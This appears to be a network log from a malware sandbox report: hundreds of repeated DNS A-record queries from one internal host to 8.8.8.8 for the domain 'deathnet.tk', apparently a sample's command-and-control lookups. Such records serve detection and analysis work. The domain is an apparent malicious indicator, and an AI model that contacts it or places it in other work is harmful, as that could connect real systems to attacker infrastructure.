              Mar 21, 2022 20:07:38.245116949 CET192.168.2.238.8.8.80xfd1eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.291805029 CET192.168.2.238.8.8.80x8ff1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.335372925 CET192.168.2.238.8.8.80x2a6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.380109072 CET192.168.2.238.8.8.80x8942Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.430896044 CET192.168.2.238.8.8.80x930eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.477216005 CET192.168.2.238.8.8.80x5de9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.522967100 CET192.168.2.238.8.8.80x38d2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.568798065 CET192.168.2.238.8.8.80xd524Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.614464998 CET192.168.2.238.8.8.80x3308Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.659455061 CET192.168.2.238.8.8.80x7e98Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.704201937 CET192.168.2.238.8.8.80x4ffbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.749695063 CET192.168.2.238.8.8.80xf134Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.792480946 CET192.168.2.238.8.8.80x19e4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.838625908 CET192.168.2.238.8.8.80x4024Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.883991003 CET192.168.2.238.8.8.80xa188Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.930484056 CET192.168.2.238.8.8.80x6902Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.973795891 CET192.168.2.238.8.8.80x7f77Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.017191887 CET192.168.2.238.8.8.80x2d4eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.063744068 CET192.168.2.238.8.8.80x1b54Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.110030890 CET192.168.2.238.8.8.80xc93cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.153078079 CET192.168.2.238.8.8.80x94fbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.197086096 CET192.168.2.238.8.8.80xfcfaStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.240612984 CET192.168.2.238.8.8.80x7a2eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.293454885 CET192.168.2.238.8.8.80x5890Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.341423035 CET192.168.2.238.8.8.80xa1f1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.388947010 CET192.168.2.238.8.8.80xb968Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.435503960 CET192.168.2.238.8.8.80x42ceStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.480273008 CET192.168.2.238.8.8.80xa78bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.531084061 CET192.168.2.238.8.8.80x92dcStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.577486038 CET192.168.2.238.8.8.80xc82Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.629645109 CET192.168.2.238.8.8.80x1623Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.675636053 CET192.168.2.238.8.8.80xac48Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.725598097 CET192.168.2.238.8.8.80x4156Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.771585941 CET192.168.2.238.8.8.80xdbc3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.818533897 CET192.168.2.238.8.8.80xda41Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.863574982 CET192.168.2.238.8.8.80x4a45Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.912102938 CET192.168.2.238.8.8.80xfdStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.959706068 CET192.168.2.238.8.8.80x9e4dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:40.013008118 CET192.168.2.238.8.8.80xae73Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:40.065269947 CET192.168.2.238.8.8.80x56efStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.069214106 CET192.168.2.238.8.8.80x56efStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.115204096 CET192.168.2.238.8.8.80x50c0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.157712936 CET192.168.2.238.8.8.80x3c0eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.202563047 CET192.168.2.238.8.8.80xa19Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.247917891 CET192.168.2.238.8.8.80x66baStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.293987989 CET192.168.2.238.8.8.80xd850Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.339293957 CET192.168.2.238.8.8.80xb302Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.382519960 CET192.168.2.238.8.8.80x4c31Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.427826881 CET192.168.2.238.8.8.80x810dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.472192049 CET192.168.2.238.8.8.80xb9b5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.516271114 CET192.168.2.238.8.8.80x1ce3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.559489012 CET192.168.2.238.8.8.80xaf1fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.613159895 CET192.168.2.238.8.8.80x800cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.658680916 CET192.168.2.238.8.8.80xe562Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.708015919 CET192.168.2.238.8.8.80x4872Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.752532959 CET192.168.2.238.8.8.80xb33eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.798120975 CET192.168.2.238.8.8.80x5f69Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.847495079 CET192.168.2.238.8.8.80x847Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.891143084 CET192.168.2.238.8.8.80x2339Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.936490059 CET192.168.2.238.8.8.80x66eeStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.980896950 CET192.168.2.238.8.8.80xa850Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.025382042 CET192.168.2.238.8.8.80x2ea0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.070624113 CET192.168.2.238.8.8.80x3452Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.116323948 CET192.168.2.238.8.8.80xe378Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.164978981 CET192.168.2.238.8.8.80x50a8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.210447073 CET192.168.2.238.8.8.80xf5afStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.252887964 CET192.168.2.238.8.8.80x2596Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.298207045 CET192.168.2.238.8.8.80x9279Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.343230963 CET192.168.2.238.8.8.80xfd70Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.389095068 CET192.168.2.238.8.8.80x4fb1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.431912899 CET192.168.2.238.8.8.80xc75cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.476738930 CET192.168.2.238.8.8.80xa814Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.524410963 CET192.168.2.238.8.8.80x54dfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.570205927 CET192.168.2.238.8.8.80xd736Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.613200903 CET192.168.2.238.8.8.80xd7d2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.658961058 CET192.168.2.238.8.8.80x95c7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.708065033 CET192.168.2.238.8.8.80xd5e3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.752929926 CET192.168.2.238.8.8.80x9e65Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.795933008 CET192.168.2.238.8.8.80x32a1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.841208935 CET192.168.2.238.8.8.80xd791Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.887706041 CET192.168.2.238.8.8.80x5abfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.932387114 CET192.168.2.238.8.8.80x87ffStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.975277901 CET192.168.2.238.8.8.80xbdccStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.020690918 CET192.168.2.238.8.8.80xa6cbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.067316055 CET192.168.2.238.8.8.80xcc3bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.113600016 CET192.168.2.238.8.8.80xaa66Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.158433914 CET192.168.2.238.8.8.80x65f8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.203600883 CET192.168.2.238.8.8.80x24ecStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.247049093 CET192.168.2.238.8.8.80xcb86Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.291373014 CET192.168.2.238.8.8.80x565eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.334934950 CET192.168.2.238.8.8.80x5baaStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.377867937 CET192.168.2.238.8.8.80xbbc3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.421166897 CET192.168.2.238.8.8.80xc19dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.465708971 CET192.168.2.238.8.8.80x4f8fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.511847019 CET192.168.2.238.8.8.80xc49cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.554624081 CET192.168.2.238.8.8.80x2f3dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.604209900 CET192.168.2.238.8.8.80xeee5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.648761988 CET192.168.2.238.8.8.80x18ffStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.696604967 CET192.168.2.238.8.8.80x5d5fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.750128984 CET192.168.2.238.8.8.80xd2f4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.795300961 CET192.168.2.238.8.8.80x792bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.848444939 CET192.168.2.238.8.8.80xc743Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.906126022 CET192.168.2.238.8.8.80xb18Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.960992098 CET192.168.2.238.8.8.80x2dbfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.005495071 CET192.168.2.238.8.8.80xb0ddStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.052306890 CET192.168.2.238.8.8.80x6f20Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.097352028 CET192.168.2.238.8.8.80x73b9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.140630007 CET192.168.2.238.8.8.80x9ecbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.189171076 CET192.168.2.238.8.8.80x5ae2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.233757019 CET192.168.2.238.8.8.80x760aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.279144049 CET192.168.2.238.8.8.80xbd40Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.323247910 CET192.168.2.238.8.8.80xe0d2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.369128942 CET192.168.2.238.8.8.80xc796Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.414211988 CET192.168.2.238.8.8.80x1d31Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.459052086 CET192.168.2.238.8.8.80xee7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.504101992 CET192.168.2.238.8.8.80xad89Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.549702883 CET192.168.2.238.8.8.80xcedcStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.593139887 CET192.168.2.238.8.8.80xc86fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.636831045 CET192.168.2.238.8.8.80xd6ebStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.682687044 CET192.168.2.238.8.8.80xa1deStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.726229906 CET192.168.2.238.8.8.80x6172Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.771188974 CET192.168.2.238.8.8.80xbd9fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.815028906 CET192.168.2.238.8.8.80xc4bdStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.857842922 CET192.168.2.238.8.8.80xcba2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.903054953 CET192.168.2.238.8.8.80x17e1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.947483063 CET192.168.2.238.8.8.80xea80Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.991946936 CET192.168.2.238.8.8.80x9a0dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.036771059 CET192.168.2.238.8.8.80x6adaStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.082078934 CET192.168.2.238.8.8.80x7f43Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.125093937 CET192.168.2.238.8.8.80xebd3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.168520927 CET192.168.2.238.8.8.80xf0daStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.214142084 CET192.168.2.238.8.8.80x9c90Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.258449078 CET192.168.2.238.8.8.80x381aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.303841114 CET192.168.2.238.8.8.80x9e61Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.348860979 CET192.168.2.238.8.8.80xbbd5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.393486023 CET192.168.2.238.8.8.80xcc6eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.438107014 CET192.168.2.238.8.8.80x81fbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.482312918 CET192.168.2.238.8.8.80xe5bfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.528110027 CET192.168.2.238.8.8.80xde9bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.571638107 CET192.168.2.238.8.8.80x704aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.614777088 CET192.168.2.238.8.8.80xca12Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.660960913 CET192.168.2.238.8.8.80x2238Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.706696033 CET192.168.2.238.8.8.80x4ed6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.756586075 CET192.168.2.238.8.8.80x64f0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.802666903 CET192.168.2.238.8.8.80xfe34Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.845823050 CET192.168.2.238.8.8.80x4ad8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.891372919 CET192.168.2.238.8.8.80x6aafStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.937793970 CET192.168.2.238.8.8.80x3af0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.982136965 CET192.168.2.238.8.8.80x88b6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.028564930 CET192.168.2.238.8.8.80x9759Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.074178934 CET192.168.2.238.8.8.80xc0b6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.120531082 CET192.168.2.238.8.8.80xbcd7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.164026022 CET192.168.2.238.8.8.80x6779Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.213613033 CET192.168.2.238.8.8.80x54dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.258651018 CET192.168.2.238.8.8.80xb560Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.303961992 CET192.168.2.238.8.8.80x2128Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.351221085 CET192.168.2.238.8.8.80x5151Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.397319078 CET192.168.2.238.8.8.80xca5fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.441111088 CET192.168.2.238.8.8.80x8351Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.485352039 CET192.168.2.238.8.8.80x9927Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.530603886 CET192.168.2.238.8.8.80xc1b8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.573909998 CET192.168.2.238.8.8.80x4e34Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.620127916 CET192.168.2.238.8.8.80x88a4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.665627956 CET192.168.2.238.8.8.80xda96Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.710443020 CET192.168.2.238.8.8.80x291Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:51.775757074 CET192.168.2.238.8.8.80x373eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:51.819317102 CET192.168.2.238.8.8.80xde86Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:51.862574100 CET192.168.2.238.8.8.80xa62dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:51.908801079 CET192.168.2.238.8.8.80xf4beStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:51.954651117 CET192.168.2.238.8.8.80x7e26Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:51.998274088 CET192.168.2.238.8.8.80x9757Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.045557976 CET192.168.2.238.8.8.80x9232Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.096822023 CET192.168.2.238.8.8.80x51e1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.142537117 CET192.168.2.238.8.8.80x813cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.186901093 CET192.168.2.238.8.8.80x9455Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.230772972 CET192.168.2.238.8.8.80xf746Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.278245926 CET192.168.2.238.8.8.80x651aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.329668999 CET192.168.2.238.8.8.80xc7dfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.377629042 CET192.168.2.238.8.8.80x8018Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.425640106 CET192.168.2.238.8.8.80x2b9dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.472368002 CET192.168.2.238.8.8.80x1f56Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.517060041 CET192.168.2.238.8.8.80xba11Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.560915947 CET192.168.2.238.8.8.80xe021Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.608262062 CET192.168.2.238.8.8.80x5ab9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.656327963 CET192.168.2.238.8.8.80xa679Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.700807095 CET192.168.2.238.8.8.80xe979Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.746604919 CET192.168.2.238.8.8.80x20a9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.794754982 CET192.168.2.238.8.8.80xddb4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.845741987 CET192.168.2.238.8.8.80x932cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.890706062 CET192.168.2.238.8.8.80x8027Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.941764116 CET192.168.2.238.8.8.80xc705Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.994734049 CET192.168.2.238.8.8.80xe512Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.041714907 CET192.168.2.238.8.8.80x9dbeStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.089057922 CET192.168.2.238.8.8.80xef36Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.138817072 CET192.168.2.238.8.8.80xade7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.186739922 CET192.168.2.238.8.8.80x3c51Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.238707066 CET192.168.2.238.8.8.80x9b18Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.285684109 CET192.168.2.238.8.8.80xe794Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.330538034 CET192.168.2.238.8.8.80x6e21Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.375197887 CET192.168.2.238.8.8.80x807dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.419667006 CET192.168.2.238.8.8.80x49c5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.462899923 CET192.168.2.238.8.8.80xd3ceStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.508033037 CET192.168.2.238.8.8.80x3fbeStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.553823948 CET192.168.2.238.8.8.80x23eaStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.597470045 CET192.168.2.238.8.8.80xf8eaStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.643317938 CET192.168.2.238.8.8.80xcc15Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.686606884 CET192.168.2.238.8.8.80xcae0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.733036041 CET192.168.2.238.8.8.80x9e34Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.784496069 CET192.168.2.238.8.8.80x5bf8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.832179070 CET192.168.2.238.8.8.80xd354Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.877312899 CET192.168.2.238.8.8.80xbfb3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.922542095 CET192.168.2.238.8.8.80xfd56Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.967195034 CET192.168.2.238.8.8.80xa220Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.013504028 CET192.168.2.238.8.8.80xfdc4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.059320927 CET192.168.2.238.8.8.80xde25Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.104007959 CET192.168.2.238.8.8.80x5ca3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.147305965 CET192.168.2.238.8.8.80xfd7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
